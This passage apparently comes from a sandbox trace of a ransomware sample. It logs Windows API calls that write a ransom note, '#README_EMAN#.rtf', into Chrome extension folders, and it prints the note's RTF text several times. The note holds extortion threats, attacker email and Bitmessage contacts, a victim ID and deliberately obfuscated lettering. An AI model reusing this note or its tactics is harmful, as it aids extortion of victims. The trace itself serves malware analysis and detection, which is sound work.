\\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.075] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.076] CloseHandle (hObject=0x294) returned 1 [0285.076] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\#readme_eman#.rtf")) returned 0xffffffff [0285.076] GetLastError () returned 0x2 [0285.076] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.077] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.077] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.077] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b 